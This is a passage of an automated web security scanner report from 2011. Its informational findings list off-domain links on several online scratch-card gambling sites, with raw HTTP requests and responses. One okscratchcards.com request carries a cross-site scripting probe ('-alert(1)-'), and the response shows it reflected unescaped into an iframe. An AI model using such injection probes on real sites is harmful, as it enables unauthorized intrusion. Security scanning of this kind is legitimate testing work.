<area shape="rect" coords="0,0,55,35" href="UnderAge.aspx" target="_self" title="Responsible online gaming" alt="Responsible online gaming" /><area shape="rect" coords="65,0,150,35" href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en" target="_blank" title="Secure and Safe slot games" alt="Secure and Safe slot games" /><area shape="rect" coords="160,0,270,35" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/RNG_certificate_080108.pdf" target="_blank" title="iTech Labs" alt="iTech Labs" /><area shape="rect" coords="280,0,445,35" href="http://www.neogames.com/" target="_blank" title="NeoGames.com" alt="NeoGames.com" /><area shape="rect" coords="460,0,545,35" href="http://www.gamblersanonymous.org/" target="_blank" title="Gamblers Anonymous" alt="Gamblers Anonymous" /><area shape="rect" coords="560,0,695,35" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank" title="Lotteries and Gaming Authority Malta" alt="Lotteries and Gaming Authority Malta" />
</map>
...[SNIP]...
ince May 2007). The Company...s registered address is at 135, High street, Sliema SLM 1549, Malta. The Company operates Karamba.com under a license issued and regulated by the
<a href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank">
Lotteries and Gaming Authority
</a>
...[SNIP]...

18.41. http://www.lga.org.mt/lga/content.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lga.org.mt
Path:	/lga/content.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.lga.org.mt/lga/content.aspx?id=109045

The response contains the following links to other domains:

http://www.adobe.com/products/acrobat/readstep2.html
http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash&promoid=BIOW

Request

GET /lga/content.aspx?id=109045 HTTP/1.1
Host: www.lga.org.mt
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.42. https://www.neogamespartners.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.neogamespartners.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

https://www.neogamespartners.com/?CMI=1

The response contains the following links to other domains:

https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/Images/ApplyNow_eng.gif
https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/Images/FooterSpam_eng.gif
https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/js/LoadFlash.js

Request

GET /?CMI=1 HTTP/1.1
Host: www.neogamespartners.com
Connection: keep-alive
Referer: http://www.scratch2cash.com/scratch-cards/instant-games/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 16 May 2011 12:46:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.neogamespartners.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Location:https://www.aspireaffiliates.com/?CMI=1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<link rel="stylesheet" href="https://www.neogamespartners.com/wp-content/themes/NGP/style.css" type="text/css" media="screen" />
<script type="text/javascript" language="javascript" src="https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/js/LoadFlash.js"></script>
...[SNIP]...
<p><img class="AffiliatesHomeRightContentTextImage aligncenter" style="cursor:pointer;" onclick="goto('sign-up');" onmouseover="this.src="https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/Images/ApplyNowOver_eng.gif"" onmouseout="this.src="https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/Images/ApplyNow_eng.gif"" src="https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/Images/ApplyNow_eng.gif" border="0" alt="" /><span class="AffiliatesHomeRightContentText" style="font-size:10px;">
...[SNIP]...
<td>
<img class="AffiliatesFooterSpamImage" border="0" src="https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/Images/FooterSpam_eng.gif" alt="">
</td>
...[SNIP]...

18.43. http://www.okscratchcards.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.okscratchcards.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.okscratchcards.com/?70343%27-alert(1)-%2789d3bb43680=1

The response contains the following links to other domains:

http://ad-emea.doubleclick.net/ad/N5493.Ok/B4240999.6;abr=!ie4;abr=!ie5;sz=728x90;ord=[timestamp]?
http://s0.2mdn.net/879366/flashwrite_1_2.js
http://www.ok.co.uk/home/

Request

GET /?70343%27-alert(1)-%2789d3bb43680=1 HTTP/1.1
Host: www.okscratchcards.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/7
Cookie: __utma=80613129.1362500150.1305546536.1305546536.1305546536.1; __utmb=80613129.6.10.1305546536; __utmc=80613129; __utmz=80613129.1305546536.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; CSI_20=EncryptedUniqueVisitorID=2D7C0CC8562A483265BA53D772EFAEEE&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; UniqueVisitorID=2D7C0CC8562A483265BA53D772EFAEEE; LanguageCode=ENG; CountryCode=US; CSITemp=20

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 12560
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Mon, 16 May 2011 12:42:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
</script>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js" type="text/javascript"></script>
...[SNIP]...
<body>
<img src="http://ad-emea.doubleclick.net/ad/N5493.Ok/B4240999.6;abr=!ie4;abr=!ie5;sz=728x90;ord=[timestamp]?" style="display:none;" alt="Click Here"/>

<iframe src="http://home.okscratchcards.com/visit.aspx?csi=20&LNG=~ENG&70343'-alert(1)-'89d3bb43680=1" height="1" width="1" frameborder="0">
...[SNIP]...
<div id="logo">
<a href="http://www.ok.co.uk/home/">
<img src="images-dec-2010/ok-magazine.gif" width="244" height="122" alt="Ok! scratch Cards" />
...[SNIP]...

18.44. http://www.okscratchcards.com/terms-and-conditions.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.okscratchcards.com
Path:	/terms-and-conditions.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.okscratchcards.com/terms-and-conditions.aspx?&

The response contains the following links to other domains:

http://213.175.195.83/mac.jpg
http://download.neogames-tech.com/Brands/okscratchcards/Website/General/MasterHeader.jpg
http://download.neogames-tech.com/Brands/okscratchcards/Website/General/PromotionInnerTop_ENG_GBP.swf
http://download.neogames-tech.com/Brands/okscratchcards/Website/General/PromotionWinner.swf
http://download.neogames-tech.com/Brands/okscratchcards/Website/General/bottom.gif
http://download.neogames-tech.com/Brands/okscratchcards/Website/General/favicon.ico
http://download.neogames-tech.com/Brands/okscratchcards/Website/General/playnow_button_ENG.gif
http://download.neogames-tech.com/Brands/okscratchcards/Website/Promotions/WeeklySchedule_ENG.html
http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf
http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/RNG_certificate_080108.pdf
http://www.gamblersanonymous.org/
http://www.neogames.com/
https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en

Request

GET /terms-and-conditions.aspx?& HTTP/1.1
Host: www.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22740

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml"><head>

<title>

Online Scratch cards, featuring over 60 flash Scratch games and scratch off tickets – okscratc
...[SNIP]...
<link href="http://home.okscratchcards.com/Brands/okscratchcards/CSS/SkinCss.css" rel="stylesheet" type="text/css"><link href="http://download.neogames-tech.com/Brands/okscratchcards/Website/General/favicon.ico" type="image/x-icon" rel="shortcut icon">
<style type="text/css">
...[SNIP]...
<a title="Scratch cards online, Flash Scratch games, Scratch off tickets, Scratchcards, Scratchies, OKscratchcards.com" href="/">
            <img border="0" alt="Scratch cards online, Flash Scratch games, Scratch off tickets, Scratchcards, Scratchies, OKscratchcards.com" src="http://download.neogames-tech.com/Brands/okscratchcards/Website/General/MasterHeader.jpg">
           </a>
...[SNIP]...
<br>
<a target="_blank" href="http://download.neogames-tech.com/Brands/okscratchcards/Website/Promotions/WeeklySchedule_ENG.html">
<img border="0" src="http://213.175.195.83/mac.jpg" alt=""></a>
...[SNIP]...
<a href="#" onclick="OpenLobby();"><img style="border: medium none ;" src="http://download.neogames-tech.com/Brands/okscratchcards/Website/General/playnow_button_ENG.gif" alt=""></a>
...[SNIP]...
<param value="1" name="SeamlessTabbing">
<embed height="218" width="146" align="middle" flashvars="BASE=http://download.neogames-tech.com/OKscratchcards.com/Website/General/&SKINNAME=OKscratchcards.com&PAGENAME=Promotions&CUR=GBP&LNG=ENG&CSI=&AMOUNT=&CURSYMALGN=L&CURDIGITSYM=%2C&CURDECIMALSYM=." pluginspage="http://www.macromedia.com/go/getflashplayer" wmode="transparent" type="application/x-shockwave-flash" allowscriptaccess="always" quality="high" src="http://download.neogames-tech.com/Brands/okscratchcards/Website/General/PromotionInnerTop_ENG_GBP.swf">

</div>
...[SNIP]...
<param value="1" name="SeamlessTabbing">
<embed height="218" width="146" align="middle" flashvars="BASE=http://download.neogames-tech.com/OKscratchcards.com/Website/General/&SKINNAME=OKscratchcards.com&PAGENAME=Promotions&CUR=GBP&LNG=ENG&CSI=&AMOUNT=&CURSYMALGN=L&CURDIGITSYM=%2C&CURDECIMALSYM=." pluginspage="http://www.macromedia.com/go/getflashplayer" wmode="transparent" type="application/x-shockwave-flash" allowscriptaccess="always" quality="high" src="http://download.neogames-tech.com/Brands/okscratchcards/Website/General/PromotionWinner.swf">

</div>
...[SNIP]...
<map name="footerMapping">
<area target="_blank" coords="200,0,286,50" alt="" href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en">
<area target="_blank" coords="290,0,410,50" alt="" href="http://www.neogames.com/">
<area coords="414,0,450,50" alt="" href="UnderAge.aspx">
<area target="_blank" coords="454,0,545,50" alt="" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/RNG_certificate_080108.pdf">
<area target="_blank" coords="554,0,620,50" alt="" href="http://www.gamblersanonymous.org/">
<area target="_blank" coords="625,0,780,50" alt="" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf">
</map>
...[SNIP]...
<td class="FooterControlImageCell"><img border="0" usemap="#footerMapping" src="http://download.neogames-tech.com/Brands/okscratchcards/Website/General/bottom.gif" alt="Scratch cards online, Flash Scratch games, Scratch off tickets, Scratchcards, Scratchies, OKscratchcards.com"></td>
...[SNIP]...
e EU since May 2007). The Company...s registered address is at 135, High street, Sliema SLM 1549, Malta. The Company operates okscratchcards.com under a provisional license issued and regulated by the <a href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank">Lotteries and Gaming Authority</a>
...[SNIP]...

18.45. http://www.primescratchcards.com/index.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/index.asp

Issue detail

The page was loaded from a URL containing a query string:

http://www.primescratchcards.com/index.asp?curr=USD&g=3

The response contains the following links to other domains:

http://ad.adserverplus.com/pixel?id=1216122&t=2
http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/RNG_certificate_080108.pdf
http://twitter.com/PrimeScratch
http://www.facebook.com/PrimeScratchCards
http://www.facebook.com/pages/PrimeScratchCards/122783514413813
http://www.gambleaware.co.uk/
http://www.gamcare.org.uk/
http://www.lga.org.mt/
http://www.primegaming.com/
http://www.youtube.com/user/primescratchcards1
https://r.openx.net/img?pixel_id=d16452704d09e96e4405f770efdd3465
https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en

Request

GET /index.asp?curr=USD&g=3 HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 29836
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:28 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: pscref=; expires=Thu, 10-May-2012 12:34:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<center><a href="http://www.facebook.com/PrimeScratchCards" target="_blank"><img src="images/side/197x100_FB.jpg" width="197" border="0">
...[SNIP]...
</a>
       <a href="http://www.youtube.com/user/primescratchcards1" target="_blank"><img src="http://www.primescratchcards.com/images/sn/tube.png" border="0"></a>
       <a href="http://www.facebook.com/pages/PrimeScratchCards/122783514413813" target="_blank"><img src="http://www.primescratchcards.com/images/sn/fbook.png" border="0"></a>
       <a href="http://twitter.com/PrimeScratch" target="_blank"><img src="http://www.primescratchcards.com/images/sn/tweet.png" border="0">
...[SNIP]...
<area shape="rect" coords="10,10,120,60" href="HelpDepositMethods.asp" alt="" title="" />
<area shape="rect" coords="125,10,208,60" href="http://www.gambleaware.co.uk/" target="_blank" alt="" title="" />
<area shape="rect" coords="338,9,419,59" href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en" target="_blank" alt="" title="" />
<area shape="rect" coords="423,8,539,58" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/RNG_certificate_080108.pdf" target="_blank" alt="" title="" />
<area shape="rect" coords="546,8,582,58" href="http://www.gamcare.org.uk/" target="_blank" alt="" title="" />
<area shape="rect" coords="631,4,724,54" href="http://www.lga.org.mt/" target="_blank" alt="" title="" />
<area shape="rect" coords="738,7,812,57" href="http://www.primegaming.com/" target="_blank" alt="" title="" />
<area shape="rect" coords="823,8,848,58" href="underage.asp" alt="" title="" />
...[SNIP]...
</script>

   <img src="https://r.openx.net/img?pixel_id=d16452704d09e96e4405f770efdd3465" width="1" height="1" />

   
   <img src="http://ad.adserverplus.com/pixel?id=1216122&t=2" width="1" height="1" />
   
...[SNIP]...

18.46. http://www.scratch2cash.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/Home.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.scratch2cash.com/Home.aspx?LanguageCode=ENG

The response contains the following links to other domains:

http://download.neogames-tech.com/Brands/Scratch2Cash/Website/General/MasterFooter.gif
http://download.neogames-tech.com/Brands/Scratch2Cash/Website/General/MasterHeader_ENG.gif
http://download.neogames-tech.com/Brands/Scratch2Cash/Website/General/corner_bl.gif
http://download.neogames-tech.com/Brands/Scratch2Cash/Website/General/corner_br.gif
http://download.neogames-tech.com/Brands/Scratch2Cash/Website/General/corner_tl.gif
http://download.neogames-tech.com/Brands/Scratch2Cash/Website/General/corner_tr.gif
http://download.neogames-tech.com/Brands/Scratch2Cash/Website/General/favicon.ico
http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf
http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/RNG_certificate_080108.pdf
http://www.gamblersanonymous.org/
http://www.neogames.com/
https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en
https://www.aspireaffiliates.com/?CMI=1

Request

GET /Home.aspx?LanguageCode=ENG HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:06 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:06 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:06 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:06 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:06 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<link type="text/css" rel="stylesheet" href="Brands/Scratch2Cash/CSS/SkinCss.css" /><link rel="shortcut icon" type="image/x-icon" href="http://download.neogames-tech.com/Brands/Scratch2Cash/Website/General/favicon.ico" />
<style type="text/css">
...[SNIP]...
</map>
<img alt="" border="0" src="http://download.neogames-tech.com/Brands/Scratch2Cash/Website/General/MasterHeader_ENG.gif" usemap="#flagsMAp"/>
</td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/Scratch2Cash/Website/General/corner_tl.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/Scratch2Cash/Website/General/corner_tl.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/Scratch2Cash/Website/General/corner_tr.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/Scratch2Cash/Website/General/corner_bl.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/Scratch2Cash/Website/General/corner_br.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/Scratch2Cash/Website/General/corner_tr.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell" valign="top"><img src="http://download.neogames-tech.com/Brands/Scratch2Cash/Website/General/corner_bl.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell" valign="top"><img src="http://download.neogames-tech.com/Brands/Scratch2Cash/Website/General/corner_br.gif" alt="Select Language"></td>
...[SNIP]...
</a>
<a id="ctl00_cphHeader_objPageHeader_lnkAffiliate" class="HeaderFooterLinks" href="https://www.aspireaffiliates.com/?CMI=1" target="_blank">
 |  Affiliates</a>
...[SNIP]...
</span><a id="ctl00_cphFooter_objPageFooter_lnkAffiliate" class="HeaderFooterLinks" href="https://www.aspireaffiliates.com/?CMI=1" target="_blank">Affiliates</a>
...[SNIP]...
<MAP NAME="footerMapping">
<area href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en" alt="Secure and Safe Scratch Tickets" coords="215,15,284,50" target="_blank"/>
<area href="http://www.neogames.com/" alt="NeoGames.com" coords="300,15,412,50" target="_blank" />
<area href="UnderAge.aspx" alt="Responsible online gaming" coords="425,15,455,50"/>
<area href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/RNG_certificate_080108.pdf" alt="iTech Labs" coords="470,15,554,50" target="_blank" />
<area href="http://www.gamblersanonymous.org/" alt="Gamblers Anonymous" coords="565,15,627,50" target="_blank" />
<area href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" alt="Lotteries and Gaming Authority Malta" coords="633,15,762,50" target="_blank" />
</MAP>
<img alt="" border="0" src="http://download.neogames-tech.com/Brands/Scratch2Cash/Website/General/MasterFooter.gif" USEMAP="#footerMapping"/>

</div>
...[SNIP]...
May 2007). The Company...s registered address is at 135, High street, Sliema SLM 1549, Malta. The Company operates Scratch2Cash.com under a license issued and regulated by the
<a href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank">
Lotteries and Gaming Authority
</a>
...[SNIP]...

18.47. http://www.scratchcardheaven.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/Home.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.scratchcardheaven.com/Home.aspx?LanguageCode=ENG

The response contains the following links to other domains:

http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/MasterHeader.gif
http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/TopMenuSeparator.gif
http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/bottom.gif
http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/corner_bl.gif
http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/corner_br.gif
http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/corner_tl.gif
http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/corner_tr.gif
http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/favicon.ico
http://download.neogames-tech.com/Brands/scratchcardheaven/Website/Home/5free_ENG_USD.gif
http://download.neogames-tech.com/Brands/scratchcardheaven/Website/Home/ContactUs_ENG.gif
http://download.neogames-tech.com/Brands/scratchcardheaven/Website/Home/Main_ENG_USD.jpg
http://download.neogames-tech.com/Brands/scratchcardheaven/Website/Home/WinnersHeader_ENG_USD.gif
http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf
http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/RNG_certificate_080108.pdf
http://www.gamblersanonymous.org/
http://www.heavenaffiliates.com/
http://www.neogames.com/
https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en

Request

GET /Home.aspx?LanguageCode=ENG HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:33 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:33 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:33 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:33 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:33 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<link type="text/css" rel="stylesheet" href="Brands/scratchcardheaven/CSS/SkinCss.css" /><link rel="shortcut icon" type="image/x-icon" href="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/favicon.ico" />
<style type="text/css">
...[SNIP]...
<a href="/" title="Scratch cards online, Flash Scratch games, Scratch off tickets, Scratchcards, Scratchies, scratchcardheaven.com">
            <img src="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/MasterHeader.gif" border="0" alt="Scratch cards online, Flash Scratch games, Scratch off tickets, Scratchcards, Scratchies, scratchcardheaven.com" />
           </a>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/corner_tl.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/corner_tl.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/corner_tr.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/corner_bl.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/corner_br.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/corner_tr.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell" valign="top"><img src="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/corner_bl.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell" valign="top"><img src="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/corner_br.gif" alt="Select Language"></td>
...[SNIP]...
<td><img border="0" class="topMenuSeparatorImage" src="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/TopMenuSeparator.gif" /></td>
...[SNIP]...
<td><img border="0" class="topMenuSeparatorImage" src="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/TopMenuSeparator.gif" /></td>
...[SNIP]...
<td><img border="0" class="topMenuSeparatorImage" src="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/TopMenuSeparator.gif" /></td>
